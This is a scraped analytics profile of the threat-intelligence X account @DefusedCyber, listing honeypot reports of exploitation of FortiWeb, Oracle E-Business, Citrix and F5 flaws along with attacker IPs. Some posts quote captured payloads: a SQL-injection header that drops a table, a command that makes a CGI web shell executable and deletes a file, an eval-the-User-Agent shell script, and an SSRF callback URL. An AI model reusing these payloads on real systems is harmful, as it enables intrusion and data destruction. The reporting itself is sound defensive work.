[GUEST ACCESS MODE: Data is scrambled or limited to provide examples. Make requests using your API key to unlock full data. Check https://lunarcrush.ai/auth for authentication information.]

# ![@DefusedCyber Avatar](https://lunarcrush.com/gi/w:26/cr:twitter::1686989812702617600.png) @DefusedCyber Defused

Defused posts on X about oracle, over the, sweden, eval the most. They currently have XXXXX followers and XX posts still getting attention that total XXXXX engagements in the last XX hours.

### Engagements: XXXXX [#](/creator/twitter::1686989812702617600/interactions)
![Engagements Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:interactions.svg)

- X Week XXXXXXX +62%
- X Month XXXXXXX +381%
- X Year XXXXXXX +43,732%

### Mentions: XX [#](/creator/twitter::1686989812702617600/posts_active)
![Mentions Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:posts_active.svg)

- X Week XX -XX%
- X Month XX +114%
- X Year XXX +2,450%

### Followers: XXXXX [#](/creator/twitter::1686989812702617600/followers)
![Followers Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:followers.svg)

- X Week XXXXX +10%
- X Month XXXXX +134%

### CreatorRank: XXXXXXX [#](/creator/twitter::1686989812702617600/influencer_rank)
![CreatorRank Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:influencer_rank.svg)

### Social Influence [#](/creator/twitter::1686989812702617600/influence)
---

**Social category influence**
[technology brands](/list/technology-brands)  XXXXX% [stocks](/list/stocks)  XXXX% [countries](/list/countries)  XXXX%

**Social topic influence**
[oracle](/topic/oracle) #123, [over the](/topic/over-the) 2.27%, [sweden](/topic/sweden) 2.27%, [eval](/topic/eval) 2.27%, [ransomware](/topic/ransomware) 2.27%, [ips](/topic/ips) 2.27%, [infrastructure](/topic/infrastructure) 2.27%, [has been](/topic/has-been) XXXX%

**Top accounts mentioned or mentioned by**
[@henkpoley](/creator/undefined) [@mrglaive](/creator/undefined) [@bethelegwu](/creator/undefined) [@simokohonen](/creator/undefined) [@elegantgent12](/creator/undefined)
### Top Social Posts [#](/creator/twitter::1686989812702617600/posts)
---
Top posts by engagements in the last XX hours

"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 64.95.13.8 ( BLNWX ) VirusTotal Detections: 0/95 🟢 JWT payload translates into: "username": "admin" "profname": "prof_admin" "vdom": "root" "loginname": "admin""  
[X Link](https://x.com/DefusedCyber/status/1975242250373517373) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-06T16:50Z 3006 followers, 26.4K engagements


"A Few Exploits Captured Over the Weekend 🧨 95.143.193.150 ( Internetport Sweden AB ) Exploiting CVE-2025-25257 (FortiWeb SQLi) 146.56.116.119 ( ORACLE-BMC-31898 ) Exploiting CVE-2025-5777 (CitrixBleed 2) 146.70.166.212 ( M247 Europe SRL ) Exploiting CVE-2025-61882 (Oracle E-Business RCE) All 0/95 on VirusTotal 🟢"  
[X Link](https://x.com/DefusedCyber/status/1977415061598564830) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-12T16:44Z 3006 followers, 11.5K engagements


"Exploitation of Oracle E-Business RCE CVE-2025-61882 continues to be active: 139.180.218.167 ( AS-VULTR ) 37.221.127.41 ( Pq Hosting Plus S.r.l. ) 5.180.24.171 ( WorkTitans B.V. ) All 0/95 on VirusTotal 🟢"  
[X Link](https://x.com/DefusedCyber/status/1977735733893796007) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T13:58Z 3006 followers, 2374 engagements


"Actor mass exploiting CVE-2025-25257 (Critical FortiWeb SQLi) from 213.138.72.10 ( Limited Liability Company TTK-Svyaz ) VirusTotal Detections: 0/95 🟢 The actor exploited multiple honeypots across a short timeframe (1 hour)"  
[X Link](https://x.com/DefusedCyber/status/1978132533733667309) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-14T16:15Z 3006 followers, 7910 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 23.234.102.176 ( TZULO ) VirusTotal Detections 0/95 🟢 The actor exploited multiple Oracle E-Business honeypots within a short timeframe 🎯"  
[X Link](https://x.com/DefusedCyber/status/1978361081803178471) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T07:23Z 3006 followers, 1847 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 146.70.44.192 ( M247 Europe SRL ) VirusTotal Detections 0/95 🟢 Actor hit multiple Oracle E-Business honeypots in a short timeframe"  
[X Link](https://x.com/DefusedCyber/status/1978801348352131257) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T12:33Z 3006 followers, 1582 engagements


"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 216.245.184.99 ( BLNWX ) VirusTotal Detections: 0/95 🟢 Payload 📸 Authorization: Bearer ';DROP/**/TABLE/**/fabric_user.a;--"  
[X Link](https://x.com/DefusedCyber/status/1979161102349934734) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-17T12:22Z 3006 followers, 69.1K engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.140.45.8 ( Hostcenter ) VirusTotal Detections 0/95 🟢 Actor exploited CVE-2025-61882 on four different Oracle honeypots within a 15-minute timeframe"  
[X Link](https://x.com/DefusedCyber/status/1979968035097018421) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T17:49Z 3006 followers, 4286 engagements


"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 149.88.26.225 ( Datacamp Limited ) VirusTotal Detections: 0/95 🟢 Payload 📸 . import os os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py')"  
[X Link](https://x.com/DefusedCyber/status/1980214208076939440) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-20T10:07Z 3006 followers, 2270 engagements


"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 104.140.226.176 ( AS62904 ) VirusTotal Detections 0/95 🟢 Actor attempts to create a new admin user with full permissions"  
[X Link](https://x.com/DefusedCyber/status/1980634240938283057) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-21T13:56Z 3006 followers, 2343 engagements


"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 195.248.71.38 ( LLC Melt-internet ) VirusTotal Detections 0/95 🟢 Actor attempts to create a new admin user with full permissions"  
[X Link](https://x.com/DefusedCyber/status/1980578501838401765) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-21T10:14Z 3006 followers, 9324 engagements


"New Critical Vulnerabilities in Oracle E-Business🚨 Two new critical vulnerabilities disclosed by Oracle - CVE-2025-53072 & CVE-2025-62481 No POC available yet - this is the perfect time to deploy some Oracle E-Business honeypots 🍯"  
[X Link](https://x.com/DefusedCyber/status/1980937798212284692) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-22T10:02Z 3006 followers, 1863 engagements


"Actor exploiting CVE-2025-25257 (Critical FortiWeb SQL Injection Vulnerability) from 139.162.82.104 ( Akamai Connected Cloud ) VirusTotal Detections: 0/95 🟢 Decoded Payload 📸 #/bin/sh printf "Content-Type: text/htmlrn"; printf "rn"; eval $ HTTP_USER_AGENT import os # os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py') #"  
[X Link](https://x.com/DefusedCyber/status/1976339547328766053) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-09T17:30Z 2951 followers, 11.3K engagements


"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +184037.21% - CVE-2021-26857 (Exchange On-Pre.) +384.58% - CVE-2021-27878 (Veritas Veritas.) +202.15% - CVE-2021-27877 (Veritas Veritas.) +183.71% - CVE-2021-27102 (Accellion File .) +38.22%"  
[X Link](https://x.com/DefusedCyber/status/1977709712561799257) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T12:15Z 2978 followers, 14.6K engagements


"Check the full ransomware vulnerabilities list 👉"  
[X Link](https://x.com/DefusedCyber/status/1977710216394207721) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T12:17Z 2999 followers, XXX engagements


"For a limited time deploy a FortiWeb decoy / honeypot for FREE 👉"  
[X Link](https://x.com/DefusedCyber/status/1978132689824735240) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-14T16:15Z 2971 followers, XXX engagements


"We want to add some more threat intel honeypots 🍯 What types honeypots should we deploy Help us choose👇"  
[X Link](https://x.com/DefusedCyber/status/1979937368573403137) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T15:47Z 2984 followers, 2178 engagements


"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 169.150.198.85 ( Datacamp Limited ) VirusTotal Detections: X / XX 🟢 Exploit attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad administrative permissions"  
[X Link](https://x.com/DefusedCyber/status/1976546196681535848) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-10T07:11Z 3001 followers, 9999 engagements


"Actor exploiting CVE-2025-52970 (FortiWeb Authentication Bypass) from 182.8.97.131 ( PT. Telekomunikasi Selular) VirusTotal Detections: 0/95 🟢 This vulnerability has not yet entered known exploitation by CISA but exploits have hit honeypots since late August"  
[X Link](https://x.com/DefusedCyber/status/1978438709335703596) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T12:32Z 3002 followers, 2455 engagements


"Breach Alert 🚨 A nation-state actor has exfiltrated BIG-IP source code and other sensitive data from F5. F5 has released multiple patches but the impact remains unclear We have added the F5 Big-IP honeypot for Defused Free users for a limited time - take advantage 🍯"  
[X Link](https://x.com/DefusedCyber/status/1978494230155743441) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T16:12Z 3002 followers, 18.1K engagements


"⚠Elevated probing of CVE-2025-32756 (buffer overflow in multiple Fortinet products) Attackers looking to exploit this vulnerability use the /module/admin.fe path to enumerate targets Associated IPs from the past X days: 31.170.22.86 178.17.172.98 143.244.63.95 143.244.33.80"  
[X Link](https://x.com/DefusedCyber/status/1973434297685283100) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-01T17:06Z 3005 followers, 5641 engagements


"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 158.179.174.140 ( ORACLE-BMC-31898 ) VirusTotal Detections: 0/95 🟢 This actor has exploited multiple honeypots within the past X days"  
[X Link](https://x.com/DefusedCyber/status/1978864766518018133) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T16:45Z 3006 followers, 1156 engagements


"Multiple actors mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) 194.127.167.106 ( Owl Limited ) 83.143.242.45 ( M247 Europe SRL ) Both actors exploited multiple Oracle honeypots simultaneously during a short time duration (within XX minutes) 🎯"  
[X Link](https://x.com/DefusedCyber/status/1979263668186681358) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-17T19:10Z 3006 followers, 3297 engagements


"🚨 Defused users are seeing targeted exploits for F5 BIG-IP honeypots The recent F5 breach may cause more active exploitation against F5 infrastructure - more fresh intel For a limited time deploy a F5 BIG-IP decoy / honeypot for FREE 👉"  
[X Link](https://x.com/DefusedCyber/status/1979614594600681834) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-18T18:24Z 3006 followers, 4464 engagements


"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 206.237.15.245 ( MOACK .Co. LTD ) VirusTotal Detections: 0/95 🟢 This actor exploited multiple Netscaler honeypots using CVE-2025-5777 within a span of XX minutes"  
[X Link](https://x.com/DefusedCyber/status/1979899080928329760) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T13:15Z 3006 followers, 1383 engagements


"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +191397.67% - CVE-2021-27878 (Veritas Veritas.) +167.85% - CVE-2021-27877 (Veritas Veritas.) +151.55% - CVE-2021-27102 (Accellion File .) +38.22% - CVE-2021-26857 (Exchange On-Pre.) +26.06%"  
[X Link](https://x.com/DefusedCyber/status/1980223102458962247) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-20T10:42Z 3006 followers, 2518 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 37.72.168.234 (HVC-AS) VirusTotal Detections 0/95 🟢 This actor exploited several Oracle honeypots within a short timeframe"  
[X Link](https://x.com/DefusedCyber/status/1980695928022417662) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-21T18:01Z 3006 followers, XXX engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.106.231.194 ( BrainStorm Network Inc ) VirusTotal Detections 0/95 🟢 This actor has been heavily exploiting Oracle E-Business honeypots for multiple days 🍯"  
[X Link](https://x.com/DefusedCyber/status/1980952429752426690) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-22T11:00Z 3006 followers, XXX engagements


"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 81.0.246.16 ( Contabo GmbH ) VirusTotal Detections: 0/95 🟢 Payload 📸 Attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad admin rights"  
[X Link](https://x.com/DefusedCyber/status/1980278833254187242) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-20T14:24Z 3006 followers, 3194 engagements


"Actor exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 116.96.46.202 (Viettel Group) VirusTotal Detections 0/95 🟢 SSRF url 📸 param name="return_url"d3sf0irfhr5o320gc8s0di1mkfokc8i7a.oast.me/param"  
[X Link](https://x.com/DefusedCyber/status/1981040364053033095) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-22T16:50Z 3006 followers, 4507 engagements